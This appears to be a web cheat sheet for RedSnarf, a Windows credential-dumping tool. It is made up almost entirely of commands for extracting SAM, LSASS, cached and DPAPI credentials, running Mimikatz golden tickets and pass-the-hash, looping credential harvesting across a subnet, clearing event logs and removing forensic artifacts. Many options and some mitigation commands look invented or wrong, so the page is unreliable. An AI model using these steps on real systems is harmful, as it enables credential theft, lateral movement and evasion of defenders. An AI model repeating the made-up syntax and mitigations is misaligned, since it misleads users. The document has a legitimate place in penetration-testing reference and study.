콘텐츠로 이동
1337skills 1337skills - 치트시트

RedSnarf

Overview

섹션 제목: “Overview”

RedSnarf is a specialized red team tool for extracting credentials and sensitive information from Windows systems. It provides methods to dump cached credentials, extract from SAM databases, harvest from memory, and extract from various Windows storage locations. Used by authorized security professionals for authorized penetration testing, red team engagements, and security assessments. Requires administrative privileges on target systems.

Installation

섹션 제목: “Installation”

Prerequisites

섹션 제목: “Prerequisites”
# Python 3.6+
python3 --version

# Required libraries
sudo apt-get install python3-pip python3-dev

# On Windows: Install Visual C++ build tools
# Download: https://visualstudio.microsoft.com/visual-cpp-build-tools/

From GitHub

섹션 제목: “From GitHub”
git clone https://github.com/nccgroup/redsnarf.git
cd redsnarf
pip3 install -r requirements.txt

Kali Linux

섹션 제목: “Kali Linux”
sudo apt-get install redsnarf

Verify Installation

섹션 제목: “Verify Installation”
python3 redsnarf.py --help
redsnarf --version
which redsnarf

Basic Syntax

섹션 제목: “Basic Syntax”
python3 redsnarf.py [options] <target>
redsnarf --help
redsnarf --version
redsnarf -h <target> -u <username> -p <password> -d <domain>

Essential Commands

섹션 제목: “Essential Commands”
CommandPurpose
-h <target>Specify target host
-u <username>Username for authentication
-p <password>Password for authentication
-d <domain>Domain name
-LLocal system extraction
-RRemote system extraction
--samExtract SAM database
--lsassDump LSASS memory
--registryExtract from registry
--mimikatzRun Mimikatz commands
--hashExtract password hashes
--cachedDump cached credentials
-o <output>Output file
-vVerbose output

Credential Extraction Methods

섹션 제목: “Credential Extraction Methods”

Local SAM Extraction

섹션 제목: “Local SAM Extraction”
# Extract local SAM database (requires SYSTEM privileges)
python3 redsnarf.py -L --sam --output local_hashes.txt

LSASS Memory Dump

섹션 제목: “LSASS Memory Dump”
# Dump LSASS process memory for credential extraction
python3 redsnarf.py -L --lsass --output lsass_dump.txt

Cached Credentials

섹션 제목: “Cached Credentials”
# Extract cached domain credentials from registry
python3 redsnarf.py -L --cached --output cached_creds.txt

Remote SAM Extraction

섹션 제목: “Remote SAM Extraction”
# Extract SAM from remote host
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Administrator \
  -p MyPassword123 \
  -d DOMAIN \
  --sam --output remote_hashes.txt

Multiple Credential Sources

섹션 제목: “Multiple Credential Sources”
# Extract from all available sources
python3 redsnarf.py \
  -L \
  --sam \
  --lsass \
  --cached \
  --registry \
  --output all_creds.txt

Registry Extraction

섹션 제목: “Registry Extraction”

Extract Credentials from Registry

섹션 제목: “Extract Credentials from Registry”
# Access Windows registry for stored credentials
python3 redsnarf.py \
  -L \
  --registry \
  --hive SAM \
  --output registry_creds.txt

Remote Registry Access

섹션 제목: “Remote Registry Access”
# Extract from remote registry via RDP/SMB
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --registry \
  --remote

AutoLogon Credentials

섹션 제목: “AutoLogon Credentials”
# Extract stored AutoLogon credentials
python3 redsnarf.py \
  -L \
  --registry \
  --key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" \
  --output autologon.txt

VPN Credentials

섹션 제목: “VPN Credentials”
# Extract stored VPN credentials from registry
python3 redsnarf.py -L --registry --vpn --output vpn_creds.txt

Hash Extraction

섹션 제목: “Hash Extraction”

Extract Password Hashes

섹션 제목: “Extract Password Hashes”
# Dump all password hashes from SAM
python3 redsnarf.py -L --hash --output hashes.txt

NTLM Hash Format

섹션 제목: “NTLM Hash Format”
# Extract NTLM hashes for cracking
python3 redsnarf.py \
  -L \
  --hash \
  --format ntlm \
  --output ntlm_hashes.txt

LM Hash Extraction

섹션 제목: “LM Hash Extraction”
# Extract legacy LM hashes (if available)
python3 redsnarf.py -L --hash --format lm --output lm_hashes.txt

Hash Analysis

섹션 제목: “Hash Analysis”
# Extract and analyze hashes
python3 redsnarf.py \
  -L \
  --hash \
  --analyze \
  --output hash_analysis.txt

Mimikatz Integration

섹션 제목: “Mimikatz Integration”

Run Mimikatz Commands

섹션 제목: “Run Mimikatz Commands”
# Execute Mimikatz commands through redsnarf
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --mimikatz \
  --command "sekurlsa::logonpasswords" \
  --output mimikatz_output.txt

Credential Dumping via Mimikatz

섹션 제목: “Credential Dumping via Mimikatz”
# Dump all credentials using Mimikatz
python3 redsnarf.py \
  -L \
  --mimikatz \
  --full \
  --output credentials_full.txt

Golden Ticket Generation

섹션 제목: “Golden Ticket Generation”
# Use Mimikatz to create golden ticket
python3 redsnarf.py \
  --mimikatz \
  --command "kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-..." \
  --output golden_ticket.txt

Remote Exploitation

섹션 제목: “Remote Exploitation”

Remote Credential Extraction

섹션 제목: “Remote Credential Extraction”
# Extract credentials from remote Windows system
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u domain\administrator \
  -p MyPassword123 \
  --remote \
  --lsass \
  --output remote_creds.txt

SMB-Based Extraction

섹션 제목: “SMB-Based Extraction”
# Use SMB protocol for credential extraction
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --smb \
  --remote \
  --sam

WMI-Based Extraction

섹션 제목: “WMI-Based Extraction”
# Extract via WMI (Windows Management Instrumentation)
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --wmi \
  --command "Get-Process lsass"

RDP Session Access

섹션 제목: “RDP Session Access”
# Extract credentials from RDP sessions
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --rdp \
  --extract-sessions \
  --output rdp_sessions.txt

Privilege Escalation Chains

섹션 제목: “Privilege Escalation Chains”

Check Privileges

섹션 제목: “Check Privileges”
# Check current privilege level
python3 redsnarf.py -L --check-privs

Token Impersonation

섹션 제목: “Token Impersonation”
# Leverage token impersonation for escalation
python3 redsnarf.py \
  -L \
  --impersonate \
  --target SYSTEM \
  --output impersonation_result.txt

Service Account Extraction

섹션 제목: “Service Account Extraction”
# Extract service account credentials
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --service-accounts \
  --output service_creds.txt

Group Policy Preferences

섹션 제목: “Group Policy Preferences”
# Extract from Group Policy Preferences (GPP)
python3 redsnarf.py \
  -L \
  --gpp \
  --output gpp_creds.txt

Batch Operations

섹션 제목: “Batch Operations”

Target Multiple Hosts

섹션 제목: “Target Multiple Hosts”
# Create target list
cat targets.txt
# 192.168.1.100 Administrator Pass123 DOMAIN
# 192.168.1.101 Admin Pass456 DOMAIN
# 192.168.1.102 User789 Pass789 DOMAIN

# Process all targets
while read host user pass domain; do
  python3 redsnarf.py -h "$host" -u "$user" -p "$pass" -d "$domain" \
    --sam --output "${host}_hashes.txt"
done < targets.txt

Automated Network Harvesting

섹션 제목: “Automated Network Harvesting”
#!/bin/bash
# Harvest credentials from network
for ip in 192.168.1.{50..100}; do
  timeout 5 bash -c "python3 redsnarf.py -h $ip -u Administrator -p password --sam" &
done
wait

Credential Aggregation

섹션 제목: “Credential Aggregation”
#!/bin/bash
# Combine all extracted credentials
cat *.txt | grep -E "admin|root|pass" > all_creds_combined.txt
sort all_creds_combined.txt | uniq > unique_creds.txt

Output Analysis

섹션 제목: “Output Analysis”

Parse Extracted Credentials

섹션 제목: “Parse Extracted Credentials”
# Extract usernames and hashes
python3 redsnarf.py -L --sam --output hashes.txt
cat hashes.txt | grep -oE "^[^:]+:[^:]+:[A-F0-9]{32}:[A-F0-9]{32}$"

Hash Format Conversion

섹션 제목: “Hash Format Conversion”
# Convert hashes for use with Hashcat
python3 redsnarf.py -L --hash --output hashes.txt
cat hashes.txt | awk -F: '{print $4}' > hashcat_ntlm.txt

Credential Deduplication

섹션 제목: “Credential Deduplication”
# Remove duplicate credentials
sort -u all_credentials.txt > unique_credentials.txt
섹션 제목: “Plaintext Credential Search”
# Search for plaintext credentials
grep -iE "password|pass|pwd|creds" extracted_output.txt

Advanced Extraction

섹션 제목: “Advanced Extraction”

Memory Parsing

섹션 제목: “Memory Parsing”
# Dump and parse process memory
python3 redsnarf.py \
  -L \
  --memory-dump \
  --process lsass \
  --output lsass_memory.bin

# Parse the dump
python3 redsnarf.py --parse-dump lsass_memory.bin --output parsed.txt

Kerberos Ticket Extraction

섹션 제목: “Kerberos Ticket Extraction”
# Extract Kerberos tickets from memory
python3 redsnarf.py \
  -L \
  --kerberos \
  --extract-tickets \
  --output tickets.txt

DPAPI Data Recovery

섹션 제목: “DPAPI Data Recovery”
# Extract DPAPI-encrypted credentials
python3 redsnarf.py \
  -L \
  --dpapi \
  --decrypt \
  --output dpapi_decrypted.txt

Credential Manager Extraction

섹션 제목: “Credential Manager Extraction”
# Extract Windows Credential Manager credentials
python3 redsnarf.py \
  -L \
  --credential-manager \
  --output credential_manager.txt

Post-Exploitation

섹션 제목: “Post-Exploitation”

Lateral Movement Preparation

섹션 제목: “Lateral Movement Preparation”
# Extract credentials for lateral movement
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --extract-all \
  --lateral-movement-prep \
  --output lateral_creds.txt

Persistence Mechanism Setup

섹션 제목: “Persistence Mechanism Setup”
# Extract data for establishing persistence
python3 redsnarf.py \
  -L \
  --persistence \
  --auto-logon \
  --scheduled-task \
  --output persistence_creds.txt

Domain Enumeration

섹션 제목: “Domain Enumeration”
# Extract domain information
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --domain-enum \
  --output domain_info.txt

Operational Security

섹션 제목: “Operational Security”

Evasion Techniques

섹션 제목: “Evasion Techniques”
# Minimize detection risk
python3 redsnarf.py \
  -L \
  --quiet \
  --no-logging \
  --minimal-output \
  --output creds.txt

Log Cleanup

섹션 제목: “Log Cleanup”
# Clear event logs post-extraction
python3 redsnarf.py \
  -L \
  --cleanup \
  --clear-logs \
  --log-type Security,System

Anti-Forensics

섹션 제목: “Anti-Forensics”
# Minimize forensic artifacts
python3 redsnarf.py \
  -L \
  --anti-forensics \
  --clear-timestamps \
  --remove-artifacts

Troubleshooting

섹션 제목: “Troubleshooting”

Access Denied

섹션 제목: “Access Denied”
# Requires SYSTEM privileges
sudo python3 redsnarf.py -L --sam

# Or use credentials with sufficient privileges
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u DOMAIN\Administrator \
  -p MyPassword123 \
  --sam

Remote Connection Issues

섹션 제목: “Remote Connection Issues”
# Verify network connectivity
ping 192.168.1.100

# Test SMB access
smbclient -L 192.168.1.100 -U Administrator%Password

# Check firewall
netstat -an | grep ESTABLISHED

Mimikatz Integration Failed

섹션 제목: “Mimikatz Integration Failed”
# Verify Mimikatz availability
which mimikatz

# Check Python dependencies
pip3 list | grep -i mimic

# Reinstall requirements
pip3 install -r requirements.txt --upgrade

Credential Storage

섹션 제목: “Credential Storage”

Secure Output

섹션 제목: “Secure Output”
# Encrypt output file
python3 redsnarf.py -L --sam --output creds.txt
gpg --symmetric --armor creds.txt

Credential Database

섹션 제목: “Credential Database”
# Store in structured format
python3 redsnarf.py \
  -L \
  --sam \
  --database credentials.db \
  --format sqlite

Real-World Scenarios

섹션 제목: “Real-World Scenarios”

Internal Network Assessment

섹션 제목: “Internal Network Assessment”
# Phase 1: Local system extraction
python3 redsnarf.py -L --extract-all --output local_system.txt

# Phase 2: Remote extraction
for host in $(cat internal_hosts.txt); do
  python3 redsnarf.py -h "$host" -u Admin -p Pass123 \
    --remote --lsass --output "${host}.txt"
done

# Phase 3: Credential aggregation
cat *.txt | grep -oE '[A-F0-9]{32}:[A-F0-9]{32}' > all_hashes.txt

Domain Compromise

섹션 제목: “Domain Compromise”
# Extract domain credentials
python3 redsnarf.py \
  -h domain-controller \
  -u Administrator \
  -p DomainPassword \
  -d DOMAIN \
  --sam --lsass --cached \
  --output domain_dump.txt

Privilege Escalation Chain

섹션 제목: “Privilege Escalation Chain”
# Extract local admin
python3 redsnarf.py -L --hash --output local_hashes.txt

# Use hash to access remote system
python3 redsnarf.py \
  -h 192.168.1.101 \
  -u Administrator \
  -p <NTLM_HASH> \
  --pass-the-hash \
  --extract-all

Best Practices

섹션 제목: “Best Practices”
  1. Obtain Authorization - Only use on authorized systems with written permission
  2. Enable Logging - Log all operations for documentation and legal requirements
  3. Minimize Exposure - Extract credentials quickly and securely
  4. Secure Credentials - Encrypt and protect extracted credential data
  5. Documentation - Document all systems accessed and credentials extracted
  6. Clean Up - Remove tools and clear logs after authorized assessment
  7. Chain Custody - Maintain evidence chain for legal proceedings
  8. Incident Response - Have remediation plan for extracted credentials

Mitigation

섹션 제목: “Mitigation”

Prevent SAM Extraction

섹션 제목: “Prevent SAM Extraction”
# Enable additional access controls
net user Administrator /active:no

# Require strong passwords
net accounts /minpwlen:14 /complexity:on

LSASS Protection

섹션 제목: “LSASS Protection”
# Enable LSASS protection (Windows 10+)
Set-ProcessMitigation -PolicyName "lsass.exe" -Enable ParentImageLoadAudit

Credential Guard

섹션 제목: “Credential Guard”
# Enable Windows Defender Credential Guard
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" `
  -Name "LsaCfgFlags" -Value 1 -PropertyType DWORD

Additional Resources

섹션 제목: “Additional Resources”